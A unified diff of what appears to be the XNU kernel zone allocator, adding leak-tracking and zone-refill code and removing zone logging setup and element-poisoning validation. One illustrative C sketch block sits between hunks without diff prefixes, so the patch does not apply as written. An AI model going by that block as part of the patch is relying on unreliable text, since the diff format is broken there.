+       if (allocation->za_element != (uintptr_t) 0 && trace_index == allocation->za_trace_index) {
+               z_alloc_collisions++;
+
+               lck_spin_unlock(&zleak_lock);
+               return TRUE;
+       }
+
+       /* STEP 1: Store the backtrace in the traces array. */
+       /* A size of zero indicates that the trace bucket is free. */
+
+       if (trace->zt_size > 0 && bcmp(trace->zt_stack, bt, (depth * sizeof(uintptr_t))) != 0) {
+               /*
+                * Different unique trace with same hash!
+                * Just bail - if we're trying to record the leaker, hopefully the other trace will be deallocated
+                * and get out of the way for later chances
+                */
+               trace->zt_collisions++;
+               z_trace_collisions++;
+
+               lck_spin_unlock(&zleak_lock);
+               return TRUE;
+       } else if (trace->zt_size > 0) {
+               /* Same trace, already added, so increment refcount */
+               trace->zt_size += allocation_size;
+       } else {
+               /* Found an unused trace bucket, record the trace here! */
+               if (trace->zt_depth != 0) { /* if this slot was previously used but not currently in use */
+                       z_trace_overwrites++;
+               }
+
+               z_trace_recorded++;
+               trace->zt_size                  = allocation_size;
+               memcpy(trace->zt_stack, bt, (depth * sizeof(uintptr_t)));
+
+               trace->zt_depth         = depth;
+               trace->zt_collisions    = 0;
+       }
+
+       /* STEP 2: Store the allocation record in the allocations array. */
+
+       if (allocation->za_element != (uintptr_t) 0) {
+               /*
+                * Straight up replace any allocation record that was there.  We don't want to do the work
+                * to preserve the allocation entries that were there, because we only record a subset of the
+                * allocations anyways.
+                */
+
+               z_alloc_collisions++;
+
+               struct ztrace* associated_trace = &ztraces[allocation->za_trace_index];
+               /* Knock off old allocation's size, not the new allocation */
+               associated_trace->zt_size -= allocation->za_size;
+       } else if (allocation->za_trace_index != 0) {
+               /* Slot previously used but not currently in use */
+               z_alloc_overwrites++;
+       }
+
+       allocation->za_element          = addr;
+       allocation->za_trace_index      = trace_index;
+       allocation->za_size             = allocation_size;
+
+       z_alloc_recorded++;
+
+       if (top_ztrace->zt_size < trace->zt_size) {
+               top_ztrace = trace;
+       }
+
+       lck_spin_unlock(&zleak_lock);
+       return TRUE;
+}
+
+/*
+ * Free the allocation record and release the stacktrace.
+ * This should be as fast as possible because it will be called for every free.
+ */
+__attribute__((noinline))
+static void
+zleak_free(uintptr_t addr,
+    vm_size_t allocation_size)
 {
-       vm_offset_t perm_value = 0;
+       if (addr == (uintptr_t) 0) {
+               return;
+       }
+
+       struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)];
+
+       /* Double-checked locking: check to find out if we're interested, lock, check to make
+        * sure it hasn't changed, then modify it, and release the lock.
+        */
+
+       if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) {
+               /* if the allocation was the one, grab the lock, check again, then delete it */
+               lck_spin_lock(&zleak_lock);
+
+               if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) {
+                       struct ztrace *trace;
+
+                       /* allocation_size had better match what was passed into zleak_log - otherwise someone is freeing into the wrong zone! */
+                       if (allocation->za_size != allocation_size) {
+                               panic("Freeing as size %lu memory that was allocated with size %lu\n",
+                                   (uintptr_t)allocation_size, (uintptr_t)allocation->za_size);
+                       }
+
+                       trace = &ztraces[allocation->za_trace_index];
+
+                       /* size of 0 indicates trace bucket is unused */
+                       if (trace->zt_size > 0) {
+                               trace->zt_size -= allocation_size;
+                       }
 
-       if (!zone->zfree_clear_mem) {
-               perm_value = ZONE_POISON;
+                       /* A NULL element means the allocation bucket is unused */
+                       allocation->za_element = 0;
+               }
+               lck_spin_unlock(&zleak_lock);
        }
+}
 
-       vm_offset_t *primary  = (vm_offset_t *) addr;
-       vm_offset_t *backup   = get_backup_ptr(zone_elem_size(zone), primary);
-
-       *primary = perm_value;
-       *backup  = perm_value;
+#else
+static inline void
+zleak_activate_if_needed(void)
+{
 }
 
-#if ZALLOC_ENABLE_POISONING
-__abortlike
-static void
-zone_element_not_clear_panic(zone_t zone, void *addr)
+static inline void
+zleak_track_if_needed(__unused zone_t z)
 {
-       panic("Zone element %p was modified after free for zone %s%s: "
-           "Expected element to be cleared", addr, zone_heap_name(zone),
-           zone->z_name);
 }
+#endif /* CONFIG_ZLEAKS */
+#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS
 
-/*
- * Validate that the element was not tampered with while it was in the
- * freelist.
- */
-void
-zalloc_validate_element(zone_t zone, vm_offset_t addr, vm_size_t size, bool validate)
+__attribute__((noinline))
+static void
+zalloc_log_or_trace_leaks(zone_t zone, vm_offset_t addr, void *fp)
 {
-       if (zone->percpu) {
-               assert(zone->zfree_clear_mem);
-               zpercpu_foreach_cpu(i) {
-                       if (memcmp_zero_ptr_aligned((void *)(addr + ptoa(i)), size)) {
-                               zone_element_not_clear_panic(zone, (void *)(addr + ptoa(i)));
+       uintptr_t       zbt[MAX_ZTRACE_DEPTH];  /* used in zone leak logging and zone leak detection */
+       unsigned int    numsaved = 0;
+
+#if ZONE_ENABLE_LOGGING
+       if (DO_LOGGING(zone)) {
+               numsaved = backtrace(zbt, MAX_ZTRACE_DEPTH, NULL);
+               btlog_add_entry(zone->zlog_btlog, (void *)addr,
+                   ZOP_ALLOC, (void **)zbt, numsaved);
+       }
+#endif /* ZONE_ENABLE_LOGGING */
+
+#if CONFIG_ZLEAKS
+       /*
+        * Zone leak detection: capture a backtrace every zleak_sample_factor
+        * allocations in this zone.
+        */
+       if (__improbable(zone->zleak_on)) {
+               if (sample_counter(&zone->zleak_capture, zleak_sample_factor)) {
+                       /* Avoid backtracing twice if zone logging is on */
+                       if (numsaved == 0) {
+                               numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL);
+                       }
+                       /* Sampling can fail if another sample is happening at the same time in a different zone. */
+                       if (!zleak_log(zbt, addr, numsaved, zone_elem_size(zone))) {
+                               /* If it failed, roll back the counter so we sample the next allocation instead. */
+                               zone->zleak_capture = zleak_sample_factor;
                        }
                }
-       } else if (zone->zfree_clear_mem) {
-               if (memcmp_zero_ptr_aligned((void *)addr, size)) {
-                       zone_element_not_clear_panic(zone, (void *)addr);
-               }
-       } else if (__improbable(validate)) {
-               const vm_offset_t *p   = (vm_offset_t *)addr;
-               const vm_offset_t *end = (vm_offset_t *)(addr + size);
+       }
 
-               for (; p < end; p++) {
-                       if (*p != ZONE_POISON) {
-                               zone_element_was_modified_panic(zone, addr,
-                                   *p, ZONE_POISON, (vm_offset_t)p - addr);
-                       }
+       if (__improbable(zone_leaks_scan_enable &&
+           !(zone_elem_size(zone) & (sizeof(uintptr_t) - 1)))) {
+               unsigned int count, idx;
+               /* Fill element, from tail, with backtrace in reverse order */
+               if (numsaved == 0) {
+                       numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL);
                }
-       } else {
-               /*
-                * If element wasn't poisoned or entirely cleared, validate that the
-                * minimum bytes that were cleared on free haven't been corrupted.
-                * addr is advanced by ptr size as we have already validated and cleared
-                * the freelist pointer/zcache canary.
-                */
-               if (memcmp_zero_ptr_aligned((void *) (addr + sizeof(vm_offset_t)),
-                   zp_min_size - sizeof(vm_offset_t))) {
-                       zone_element_not_clear_panic(zone, (void *)addr);
+               count = (unsigned int)(zone_elem_size(zone) / sizeof(uintptr_t));
+               if (count >= numsaved) {
+                       count = numsaved - 1;
+               }
+               for (idx = 0; idx < count; idx++) {
+                       ((uintptr_t *)addr)[count - 1 - idx] = zbt[idx + 1];
                }
        }
+#endif /* CONFIG_ZLEAKS */
 }
-#endif /* ZALLOC_ENABLE_POISONING */
 
-#pragma mark Zone Leak Detection
+static inline bool
+zalloc_should_log_or_trace_leaks(zone_t zone, vm_size_t elem_size)
+{
+#if ZONE_ENABLE_LOGGING
+       if (DO_LOGGING(zone)) {
+               return true;
+       }
+#endif /* ZONE_ENABLE_LOGGING */
+#if CONFIG_ZLEAKS
+       /*
+        * Zone leak detection: capture a backtrace every zleak_sample_factor
+        * allocations in this zone.
+        */
+       if (zone->zleak_on) {
+               return true;
+       }
+       if (zone_leaks_scan_enable && !(elem_size & (sizeof(uintptr_t) - 1))) {
+               return true;
+       }
+#endif /* CONFIG_ZLEAKS */
+       return false;
+}
 
-/*
- * Zone leak debugging code
- *
- * When enabled, this code keeps a log to track allocations to a particular zone that have not
- * yet been freed.  Examining this log will reveal the source of a zone leak.  The log is allocated
- * only when logging is enabled, so there is no effect on the system when it's turned off.  Logging is
- * off by default.
- *
- * Enable the logging via the boot-args. Add the parameter "zlog=<zone>" to boot-args where <zone>
- * is the name of the zone you wish to log.
- *
- * This code only tracks one zone, so you need to identify which one is leaking first.
- * Generally, you'll know you have a leak when you get a "zalloc retry failed 3" panic from the zone
- * garbage collector.  Note that the zone name printed in the panic message is not necessarily the one
- * containing the leak.  So do a zprint from gdb and locate the zone with the bloated size.  This
- * is most likely the problem zone, so set zlog in boot-args to this zone name, reboot and re-run the test.  The
- * next time it panics with this message, examine the log using the kgmacros zstack, findoldest and countpcs.
- * See the help in the kgmacros for usage info.
- *
- *
- * Zone corruption logging
- *
- * Logging can also be used to help identify the source of a zone corruption.  First, identify the zone
- * that is being corrupted, then add "-zc zlog=<zone name>" to the boot-args.  When -zc is used in conjunction
- * with zlog, it changes the logging style to track both allocations and frees to the zone.  So when the
- * corruption is detected, examining the log will show you the stack traces of the callers who last allocated
- * and freed any particular element in the zone.  Use the findelem kgmacro with the address of the element that's been
- * corrupted to examine its history.  This should lead to the source of the corruption.
- */
+#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */
+#if ZONE_ENABLE_LOGGING
 
-/* Returns TRUE if we rolled over the counter at factor */
-__header_always_inline bool
-sample_counter(volatile uint32_t *count_p, uint32_t factor)
+__attribute__((noinline))
+static void
+zfree_log_trace(zone_t zone, vm_offset_t addr, void *fp)
 {
-       uint32_t old_count, new_count = 0;
-       if (count_p != NULL) {
-               os_atomic_rmw_loop(count_p, old_count, new_count, relaxed, {
-                       new_count = old_count + 1;
-                       if (new_count >= factor) {
-                               new_count = 0;
-                       }
-               });
+       /*
+        * See if we're doing logging on this zone.
+        *
+        * There are two styles of logging used depending on
+        * whether we're trying to catch a leak or corruption.
+        */
+       if (__improbable(DO_LOGGING(zone))) {
+               if (corruption_debug_flag) {
+                       uintptr_t       zbt[MAX_ZTRACE_DEPTH];
+                       unsigned int    numsaved;
+                       /*
+                        * We're logging to catch a corruption.
+                        *
+                        * Add a record of this zfree operation to log.
+                        */
+                       numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL);
+                       btlog_add_entry(zone->zlog_btlog, (void *)addr, ZOP_FREE,
+                           (void **)zbt, numsaved);
+               } else {
+                       /*
+                        * We're logging to catch a leak.
+                        *
+                        * Remove any record we might have for this element
+                        * since it's being freed.  Note that we may not find it
+                        * if the buffer overflowed and that's OK.
+                        *
+                        * Since the log is of a limited size, old records get
+                        * overwritten if there are more zallocs than zfrees.
+                        */
+                       btlog_remove_entries_for_element(zone->zlog_btlog, (void *)addr);
+               }
        }
+}
 
-       return new_count == 0;
+#endif /* ZONE_ENABLE_LOGGING */
+
+/*  These functions live outside of CONFIG_ZLEAKS because they are also used in
+ *  mbuf.c for mbuf leak-detection.  This is why they lack the z_ prefix.
+ */
+
+/* "Thomas Wang's 32/64 bit mix functions."  http://www.concentric.net/~Ttwang/tech/inthash.htm */
+uintptr_t
+hash_mix(uintptr_t x)
+{
+#ifndef __LP64__
+       x += ~(x << 15);
+       x ^=  (x >> 10);
+       x +=  (x << 3);
+       x ^=  (x >> 6);
+       x += ~(x << 11);
+       x ^=  (x >> 16);
+#else
+       x += ~(x << 32);
+       x ^=  (x >> 22);
+       x += ~(x << 13);
+       x ^=  (x >> 8);
+       x +=  (x << 3);
+       x ^=  (x >> 15);
+       x += ~(x << 27);
+       x ^=  (x >> 31);
+#endif
+       return x;
 }
 
-#if ZONE_ENABLE_LOGGING
-/* Log allocations and frees to help debug a zone element corruption */
-TUNABLE(bool, corruption_debug_flag, "-zc", false);
+uint32_t
+hashbacktrace(uintptr_t* bt, uint32_t depth, uint32_t max_size)
+{
+       uintptr_t hash = 0;
+       uintptr_t mask = max_size - 1;
 
-#define MAX_NUM_ZONES_ALLOWED_LOGGING   10 /* Maximum 10 zones can be logged at once */
+       while (depth) {
+               hash += bt[--depth];
+       }
 
-static int  max_num_zones_to_log = MAX_NUM_ZONES_ALLOWED_LOGGING;
-static int  num_zones_logged = 0;
+       hash = hash_mix(hash) & mask;
+
+       assert(hash < max_size);
+
+       return (uint32_t) hash;
+}
 
 /*
- * The number of records in the log is configurable via the zrecs parameter in boot-args.  Set this to
- * the number of records you want in the log.  For example, "zrecs=10" sets it to 10 records. Since this
- * is the number of stacks suspected of leaking, we don't need many records.
+ *  TODO: Determine how well distributed this is
+ *      max_size must be a power of 2, e.g. 0x10000, because 0x10000 - 1 is 0x0FFFF, which makes a good bitmask.
+ */
+uint32_t
+hashaddr(uintptr_t pt, uint32_t max_size)
+{
+       uintptr_t hash = 0;
+       uintptr_t mask = max_size - 1;
+
+       hash = hash_mix(pt) & mask;
+
+       assert(hash < max_size);
+
+       return (uint32_t) hash;
+}
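+
+/*
+ * Usage sketch (illustrative): with a power-of-two table size the mask
+ * replaces a modulo, as done by zleak_log() and zleak_free() above:
+ *
+ *     struct zallocation *a =
+ *         &zallocations[hashaddr((uintptr_t)addr, zleak_alloc_buckets)];
+ *     struct ztrace *t =
+ *         &ztraces[hashbacktrace(bt, depth, zleak_trace_buckets)];
+ */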
+
+#endif /* !ZALLOC_TEST */
+#pragma mark zone (re)fill
+#if !ZALLOC_TEST
+
+/*!
+ * @defgroup Zone Refill
+ * @{
+ *
+ * @brief
+ * Functions handling the zone refill machinery.
+ *
+ * @discussion
+ * Zones are refilled based on 3 mechanisms: direct expansion, async expansion,
+ * VM-specific replenishment. Zones using VM-specific replenishment are marked
+ * with the @c z_replenishes property set.
+ *
+ * @c zalloc_ext() is the codepath that kicks the zone refill when the zone is
+ * dropping below half of its @c z_elems_rsv (0 for most zones) and will:
+ *
+ * - call @c zone_expand_locked() directly if the caller is allowed to block,
+ *
+ * - wake up the asynchronous expansion thread call if the caller is not
+ *   allowed to block,
+ *
+ * - call @c zone_replenish_locked() to kick the replenish state machine.
+ *
+ *
+ * <h2>Synchronous expansion</h2>
+ *
+ * This mechanism is actually the only one that may refill a zone, and all the
+ * other ones funnel through this one eventually.
+ *
+ * @c zone_expand_locked() implements the core of the expansion mechanism,
+ * and will do so while a caller specified predicate is true.
+ *
+ * Zone expansion allows for up to 2 threads to concurrently refill the zone:
+ * - one VM privileged thread,
+ * - one regular thread.
+ *
+ * Regular threads that refill will put down their identity in @c z_expander,
+ * so that priority inversion avoidance can be implemented.
+ *
+ * However, VM privileged threads are allowed to use VM page reserves,
+ * which allows for the system to recover from extreme memory pressure
+ * situations, allowing for the few allocations that @c zone_gc() or
+ * killing processes require.
+ *
+ * When a VM privileged thread is also expanding, the @c z_expander_vm_priv bit
+ * is set. @c z_expander is not necessarily the identity of this VM privileged
+ * thread (it is if the VM privileged thread came in first; otherwise it names
+ * the regular expander, and could even be @c THREAD_NULL).
+ *
+ * Note that the pageout-scan daemon might be BG and is VM privileged. To avoid
+ * spending a whole pointer on priority inheritance for VM privileged threads
+ * (and other issues related to having two owners), we use the rwlock boost as
+ * a stop gap to avoid priority inversions.
+ *
+ *
+ * <h2>Chunk wiring policies</h2>
+ *
+ * Zones allocate memory in chunks of @c zone_t::z_chunk_pages pages at a time
+ * to try to minimize fragmentation relative to element sizes not aligning with
+ * a chunk size well.  However, this can grow large and be hard to fulfill on
+ * a system under a lot of memory pressure (chunks can be as large as 8 pages on
+ * 4k page systems).
+ *
+ * This is why, when under memory pressure the system allows chunks to be
+ * partially populated. The metadata of the first page in the chunk maintains
+ * the count of actually populated pages.
+ *
+ * The metadata for addresses assigned to a zone are found on 4 queues:
+ * - @c z_pageq_empty has chunk heads with populated pages and no allocated
+ *   elements (those can be targeted by @c zone_gc()),
+ * - @c z_pageq_partial has chunk heads with populated pages that are partially
+ *   used,
+ * - @c z_pageq_full has chunk heads with populated pages with no free elements
+ *   left,
+ * - @c z_pageq_va has either chunk heads for sequestered VA space assigned to
+ *   the zone forever (if @c z_va_sequester is enabled), or the first secondary
+ *   metadata for a chunk whose corresponding page is not populated in the
+ *   chunk.
+ *
+ * When new pages need to be wired/populated, chunks from the @c z_pageq_va
+ * queues are preferred.
+ *
+ *
+ * <h2>Asynchronous expansion</h2>
+ *
+ * This mechanism allows for refilling zones used mostly with non-blocking
+ * callers. It relies on a thread call (@c zone_expand_callout) which will
+ * iterate all zones and refill the ones marked with @c z_async_refilling.
+ *
+ * NOTE: If the calling thread for zalloc_noblock is lower priority than
+ *       the thread_call, then zalloc_noblock to an empty zone may succeed.
+ *
+ *
+ * <h2>Dealing with zone allocations from the mach VM code</h2>
+ *
+ * The implementation of the mach VM itself uses the zone allocator
+ * for things like the vm_map_entry data structure. In order to prevent
+ * an infinite recursion problem when adding more pages to a zone, @c zalloc
+ * uses a replenish thread to refill the VM layer's zones before they have
+ * too few remaining free entries. The reserved remaining free entries
+ * guarantee that the VM routines can get entries from already mapped pages.
+ *
+ * In order for that to work, the amount of allocations in the nested
+ * case have to be bounded. There are currently 2 replenish zones, and
+ * if each needs 1 element of each zone to add a new page to itself, that
+ * gives us a minimum reserve of 2 elements.
+ *
+ * There is also a deadlock issue with the zone garbage collection thread,
+ * or any thread that is trying to free zone pages. While holding
+ * the kernel's map lock they may need to allocate new VM map entries, hence
+ * we need enough reserve to allow them to get past the point of holding the
+ * map lock. After freeing that page, the GC thread will wait in
+ * @c zone_reclaim() until the replenish threads can finish.
+ * Since there's only 1 GC thread at a time, that adds a minimum of 1 to the
+ * reserve size.
+ *
+ * Since the minimum amount you can add to a zone is 1 page,
+ * we'll use 16K (from ARM) as the refill size on all platforms.
+ *
+ * When a replenished zone's free count drops to half of that, i.e. REFILL_SIZE / 2,
+ * @c zalloc_ext() will wake the replenish thread. The replenish thread runs
+ * until at least REFILL_SIZE worth of free elements exist, before sleeping again.
+ * In the meantime threads may continue to use the reserve until there are only
+ * REFILL_SIZE / 4 elements left. Below that point only the replenish threads
+ * themselves and the GC thread may continue to use from the reserve.
  */
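
A minimal sketch of the dispatch described above, under the assumption that the zone lock is already held and that `can_block` is a hypothetical stand-in for the Z_NOPAGEWAIT / context checks that zalloc_ext() really performs; the three callees are the functions defined later in this section:

    /* Illustrative only: how a zone falling below z_elems_rsv / 2 gets refilled. */
    static void
    zone_refill_dispatch_sketch(zone_t z, zalloc_flags_t flags, bool can_block)
    {
        if (z->z_replenishes) {
            /* VM-internal zones: kick the dedicated replenish machinery */
            zone_replenish_locked(z);
        } else if (!can_block) {
            /* non-blocking callers: defer to the async expansion thread call */
            zone_expand_async_schedule_if_needed(z);
        } else {
            /* blocking callers: expand inline until the reserve is satisfied */
            zone_expand_locked(z, flags, zalloc_needs_refill);
        }
    }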
 
-#if defined(__LP64__)
-#define ZRECORDS_MAX            2560            /* Max records allowed in the log */
-#else
-#define ZRECORDS_MAX            1536            /* Max records allowed in the log */
-#endif
-#define ZRECORDS_DEFAULT        1024            /* default records in log if zrecs is not specificed in boot-args */
-
-static TUNABLE(uint32_t, log_records, "zrecs", ZRECORDS_DEFAULT);
+static thread_call_data_t zone_expand_callout;
 
-static void
-zone_enable_logging(zone_t z)
+static inline kma_flags_t
+zone_kma_flags(zone_t z, zalloc_flags_t flags)
 {
-       z->zlog_btlog = btlog_create(log_records, MAX_ZTRACE_DEPTH,
-           (corruption_debug_flag == FALSE) /* caller_will_remove_entries_for_element? */);
+       kma_flags_t kmaflags = KMA_KOBJECT | KMA_ZERO;
 
-       if (z->zlog_btlog) {
-               printf("zone: logging started for zone %s%s\n",
-                   zone_heap_name(z), z->z_name);
-       } else {
-               printf("zone: couldn't allocate memory for zrecords, turning off zleak logging\n");
-               z->zone_logging = false;
+       if (z->z_noencrypt) {
+               kmaflags |= KMA_NOENCRYPT;
+       }
+       if (flags & Z_NOPAGEWAIT) {
+               kmaflags |= KMA_NOPAGEWAIT;
+       }
+       if (z->z_permanent || (!z->z_destructible && z->z_va_sequester)) {
+               kmaflags |= KMA_PERMANENT;
        }
+       if (z->z_submap_idx == Z_SUBMAP_IDX_GENERAL &&
+           z->kalloc_heap != KHEAP_ID_NONE) {
+               kmaflags |= KMA_KHEAP;
+       }
+
+       return kmaflags;
 }
 
-/**
- * @function zone_setup_logging
+/*!
+ * @function zcram_and_lock()
  *
- * @abstract
- * Optionally sets up a zone for logging.
+ * @brief
+ * Prepare some memory for being usable for allocation purposes.
  *
  * @discussion
- * We recognized two boot-args:
+ * Prepare memory in <code>[addr + ptoa(pg_start), addr + ptoa(pg_end))</code>
+ * to be usable in the zone.
  *
- *     zlog=<zone_to_log>
- *     zrecs=<num_records_in_log>
+ * This function assumes the metadata is already populated for the range.
  *
- * The zlog arg is used to specify the zone name that should be logged,
- * and zrecs is used to control the size of the log.
+ * Calling this function with @c pg_start being 0 means that the memory
+ * is either a partial chunk, or a full chunk, that isn't published anywhere
+ * and the initialization can happen without locks held.
  *
- * If zrecs is not specified, a default value is used.
+ * Calling this function with a non-zero @c pg_start means that we are extending
+ * an existing chunk: the memory in <code>[addr, addr + ptoa(pg_start))</code>
+ * is already usable and published in the zone, so extending it requires holding
+ * the zone lock.
+ *
+ * @param zone          The zone to cram new populated pages into
+ * @param addr          The base address for the chunk(s)
+ * @param pg_va_new     The number of virtual pages newly assigned to the zone
+ * @param pg_start      The first newly populated page relative to @a addr.
+ * @param pg_end        The after-last newly populated page relative to @a addr.
+ * @param kind          The kind of memory assigned to the zone.
  */
 static void
-zone_setup_logging(zone_t z)
+zcram_and_lock(zone_t zone, vm_offset_t addr, uint32_t pg_va_new,
+    uint32_t pg_start, uint32_t pg_end, zone_addr_kind_t kind)
 {
-       char zone_name[MAX_ZONE_NAME]; /* Temp. buffer for the zone name */
-       char zlog_name[MAX_ZONE_NAME]; /* Temp. buffer to create the strings zlog1, zlog2 etc... */
-       char zlog_val[MAX_ZONE_NAME];  /* the zone name we're logging, if any */
+       zone_id_t zindex = zone_index(zone);
+       vm_offset_t elem_size = zone_elem_size(zone);
+       uint32_t free_start = 0, free_end = 0;
 
-       /*
-        * Don't allow more than ZRECORDS_MAX records even if the user asked for more.
-        *
-        * This prevents accidentally hogging too much kernel memory
-        * and making the system unusable.
-        */
-       if (log_records > ZRECORDS_MAX) {
-               log_records = ZRECORDS_MAX;
-       }
+       struct zone_page_metadata *meta = zone_meta_from_addr(addr);
+       uint32_t chunk_pages = zone->z_chunk_pages;
 
-       /*
-        * Append kalloc heap name to zone name (if zone is used by kalloc)
-        */
-       snprintf(zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name);
+       assert(pg_start < pg_end && pg_end <= chunk_pages);
 
-       /* zlog0 isn't allowed. */
-       for (int i = 1; i <= max_num_zones_to_log; i++) {
-               snprintf(zlog_name, MAX_ZONE_NAME, "zlog%d", i);
+       if (pg_start == 0) {
+               uint16_t chunk_len = (uint16_t)pg_end;
+               uint16_t secondary_len = ZM_SECONDARY_PAGE;
+               bool inline_bitmap = false;
 
-               if (PE_parse_boot_argn(zlog_name, zlog_val, sizeof(zlog_val)) &&
-                   track_this_zone(zone_name, zlog_val)) {
-                       z->zone_logging = true;
-                       num_zones_logged++;
-                       break;
+               if (zone->z_percpu) {
+                       chunk_len = 1;
+                       secondary_len = ZM_SECONDARY_PCPU_PAGE;
+                       assert(pg_end == zpercpu_count());
+               }
+               if (!zone->z_permanent) {
+                       inline_bitmap = zone->z_chunk_elems <= 32 * chunk_pages;
+               }
+
+               meta[0] = (struct zone_page_metadata){
+                       .zm_index         = zindex,
+                       .zm_inline_bitmap = inline_bitmap,
+                       .zm_chunk_len     = chunk_len,
+               };
+               if (kind == ZONE_ADDR_FOREIGN) {
+                       /* Never hit z_pageq_empty */
+                       meta[0].zm_alloc_size = ZM_ALLOC_SIZE_LOCK;
+               }
+
+               for (uint16_t i = 1; i < chunk_pages; i++) {
+                       meta[i] = (struct zone_page_metadata){
+                               .zm_index          = zindex,
+                               .zm_inline_bitmap  = inline_bitmap,
+                               .zm_chunk_len      = secondary_len,
+                               .zm_page_index     = i,
+                       };
+               }
+
+               free_end = (uint32_t)ptoa(chunk_len) / elem_size;
+               if (!zone->z_permanent) {
+                       zone_meta_bits_init(meta, free_end, zone->z_chunk_elems);
                }
+       } else {
+               assert(!zone->z_percpu && !zone->z_permanent);
+
+               free_end = (uint32_t)ptoa(pg_end) / elem_size;
+               free_start = (uint32_t)ptoa(pg_start) / elem_size;
+       }
+
+#if VM_MAX_TAG_ZONES
+       if (__improbable(zone->tags)) {
+               assert(kind == ZONE_ADDR_NATIVE && !zone->z_percpu);
+               ztMemoryAdd(zone, addr + ptoa(pg_start),
+                   ptoa(pg_end - pg_start));
        }
+#endif /* VM_MAX_TAG_ZONES */
 
        /*
-        * Backwards compat. with the old boot-arg used to specify single zone
-        * logging i.e. zlog Needs to happen after the newer zlogn checks
-        * because the prefix will match all the zlogn
-        * boot-args.
+        * Insert the initialized pages / metadatas into the right lists.
         */
-       if (!z->zone_logging &&
-           PE_parse_boot_argn("zlog", zlog_val, sizeof(zlog_val)) &&
-           track_this_zone(zone_name, zlog_val)) {
-               z->zone_logging = true;
-               num_zones_logged++;
+
+       zone_lock(zone);
+       assert(zone->z_self == zone);
+
+       if (pg_start != 0) {
+               assert(meta->zm_chunk_len == pg_start);
+
+               zone_meta_bits_merge(meta, free_start, free_end);
+               meta->zm_chunk_len = (uint16_t)pg_end;
+
+               /*
+                * consume the zone_meta_lock_in_partial()
+                * done in zone_expand_locked()
+                */
+               zone_meta_alloc_size_sub(zone, meta, ZM_ALLOC_SIZE_LOCK);
+               zone_meta_remqueue(zone, meta);
        }
 
+       if (zone->z_permanent || meta->zm_alloc_size) {
+               zone_meta_queue_push(zone, &zone->z_pageq_partial, meta);
+       } else {
+               zone_meta_queue_push(zone, &zone->z_pageq_empty, meta);
+               zone->z_wired_empty += zone->z_percpu ? 1 : pg_end;
+       }
+       if (pg_end < chunk_pages) {
+               /* push any non populated residual VA on z_pageq_va */
+               zone_meta_queue_push(zone, &zone->z_pageq_va, meta + pg_end);
+       }
 
-       /*
-        * If we want to log a zone, see if we need to allocate buffer space for
-        * the log.
-        *
-        * Some vm related zones are zinit'ed before we can do a kmem_alloc, so
-        * we have to defer allocation in that case.
-        *
-        * zone_init() will finish the job.
-        *
-        * If we want to log one of the VM related zones that's set up early on,
-        * we will skip allocation of the log until zinit is called again later
-        * on some other zone.
-        */
-       if (z->zone_logging && startup_phase >= STARTUP_SUB_KMEM_ALLOC) {
-               zone_enable_logging(z);
+       zone_elems_free_add(zone, free_end - free_start);
+       zone->z_elems_avail += free_end - free_start;
+       zone->z_wired_cur   += zone->z_percpu ? 1 : pg_end - pg_start;
+       if (pg_va_new) {
+               zone->z_va_cur += zone->z_percpu ? 1 : pg_va_new;
+       }
+       if (zone->z_wired_hwm < zone->z_wired_cur) {
+               zone->z_wired_hwm = zone->z_wired_cur;
        }
+
+       os_atomic_add(&zones_phys_page_mapped_count, pg_end - pg_start, relaxed);
 }
 
-/*
- * Each record in the log contains a pointer to the zone element it refers to,
- * and a small array to hold the pc's from the stack trace.  A
- * record is added to the log each time a zalloc() is done in the zone_of_interest.  For leak debugging,
- * the record is cleared when a zfree() is done.  For corruption debugging, the log tracks both allocs and frees.
- * If the log fills, old records are replaced as if it were a circular buffer.
- */
+static void
+zcram(zone_t zone, vm_offset_t addr, uint32_t pages, zone_addr_kind_t kind)
+{
+       uint32_t chunk_pages = zone->z_chunk_pages;
 
+       assert(pages % chunk_pages == 0);
+       for (; pages > 0; pages -= chunk_pages, addr += ptoa(chunk_pages)) {
+               zcram_and_lock(zone, addr, chunk_pages, 0, chunk_pages, kind);
+               zone_unlock(zone);
+       }
+}
 
-/*
- * Decide if we want to log this zone by doing a string compare between a zone name and the name
- * of the zone to log. Return true if the strings are equal, false otherwise.  Because it's not
- * possible to include spaces in strings passed in via the boot-args, a period in the logname will
- * match a space in the zone name.
- */
+void
+zone_cram_foreign(zone_t zone, vm_offset_t newmem, vm_size_t size)
+{
+       uint32_t pages = (uint32_t)atop(size);
 
-/*
- * Test if we want to log this zalloc/zfree event.  We log if this is the zone we're interested in and
- * the buffer for the records has been allocated.
- */
+       if (!from_zone_map(newmem, size, ZONE_ADDR_FOREIGN)) {
+               panic("zone_cram_foreign: foreign memory [%p] being crammed is "
+                   "outside of expected range", (void *)newmem);
+       }
+       if (!zone->z_allows_foreign) {
+               panic("zone_cram_foreign: foreign memory [%p] being crammed in "
+                   "zone '%s%s' not expecting it", (void *)newmem,
+                   zone_heap_name(zone), zone_name(zone));
+       }
+       if (size % ptoa(zone->z_chunk_pages)) {
+               panic("zone_cram_foreign: foreign memory [%p] being crammed has "
+                   "invalid size %zx", (void *)newmem, (size_t)size);
+       }
+       if (startup_phase >= STARTUP_SUB_ZALLOC) {
+               panic("zone_cram_foreign: foreign memory [%p] being crammed "
+                   "after zalloc is initialized", (void *)newmem);
+       }
 
-#define DO_LOGGING(z)           (z->zlog_btlog != NULL)
-#else /* !ZONE_ENABLE_LOGGING */
-#define DO_LOGGING(z)           0
-#endif /* !ZONE_ENABLE_LOGGING */
+       bzero((void *)newmem, size);
+       zcram(zone, newmem, pages, ZONE_ADDR_FOREIGN);
+}
+
+void
+zone_fill_initially(zone_t zone, vm_size_t nelems)
+{
+       kma_flags_t kmaflags;
+       kern_return_t kr;
+       vm_offset_t addr;
+       uint32_t pages;
+
+       assert(!zone->z_permanent && !zone->collectable && !zone->z_destructible);
+       assert(zone->z_elems_avail == 0);
+
+       kmaflags = zone_kma_flags(zone, Z_WAITOK) | KMA_PERMANENT;
+       pages = zone_alloc_pages_for_nelems(zone, nelems);
